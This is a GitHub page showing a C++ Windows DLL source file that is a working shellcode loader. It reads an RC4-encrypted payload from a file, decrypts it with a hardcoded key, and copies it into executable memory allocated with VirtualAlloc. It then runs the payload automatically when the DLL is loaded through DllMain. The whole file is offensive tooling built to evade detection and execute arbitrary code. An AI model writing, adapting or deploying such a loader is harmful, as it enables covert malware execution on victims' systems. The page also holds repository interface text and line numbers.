-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathv2_dll.cpp
More file actions
104 lines (90 loc) · 3.14 KB
/
Copy pathv2_dll.cpp
File metadata and controls
104 lines (90 loc) · 3.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#include <iostream>
#include <fstream>
#include <vector>
#include <windows.h>
#include <cstring>
void RC4Decrypt(std::vector<char>& data, const std::string& key) {
int keylen = key.size();
unsigned char s[256];
for (int i = 0; i < 256; ++i)
s[i] = i;
int j = 0;
for (int i = 0; i < 256; ++i) {
j = (j + s[i] + key[i % keylen]) % 256;
std::swap(s[i], s[j]);
}
int i = 0;
j = 0;
for (size_t n = 0; n < data.size(); ++n) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
std::swap(s[i], s[j]);
data[n] ^= s[(s[i] + s[j]) % 256];
}
}
std::vector<char> LoadShellcodeFromFile(const char* filename) {
std::ifstream file(filename, std::ios::binary);
if (!file) {
std::cerr << "Failed to open file: " << filename << std::endl;
return {};
}
return std::vector<char>((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>());
}
void LoadShellcode(const char* filename) {
// Load encrypted shellcode from file
std::vector<char> buffer = LoadShellcodeFromFile(filename);
if (buffer.empty()) {
// std::cerr << "Failed to load from file." << std::endl;
return;
}
// Decrypt the shellcode
std::string key = "cookie"; // Match this key with the encryption key
RC4Decrypt(buffer, key);
// Debug: Display decrypted shellcode
// std::cout << "Decrypted (first 10 bytes): ";
for (size_t i = 0; i < std::min<size_t>(10, buffer.size()); ++i)
std::cout << std::hex << (unsigned char)buffer[i] << " ";
std::cout << std::endl;
// Allocate executable memory
void* exec = VirtualAlloc(nullptr, buffer.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (exec == nullptr) {
std::cerr << "Failed to allocate executable memory. Error: " << GetLastError() << std::endl;
return;
}
std::cout << "Executable memory allocated at: " << exec << std::endl;
// Copy code to allocated memory
std::memcpy(exec, buffer.data(), buffer.size());
// Execute the code
try {
void (*func)() = (void(*)())exec;
std::cout << "Executing shellcode..." << std::endl;
func();
}
catch (...) {
std::cerr << "Shellcode execution caused an exception!" << std::endl;
}
// Free allocated memory
VirtualFree(exec, 0, MEM_RELEASE);
std::cout << "Executable memory released." << std::endl;
}
int running() {
const char* filename = "enc.txt"; // Provide the correct path to the encrypted file
LoadShellcode(filename);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hinstDLL); // Prevent thread notifications for efficiency
running(); // Load and execute the shellcode when the DLL is attached
break;
case DLL_PROCESS_DETACH:
// Perform cleanup tasks if necessary
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
// Thread-specific tasks (not used in this example)
break;
}
return TRUE; // Indicate successful initialization
}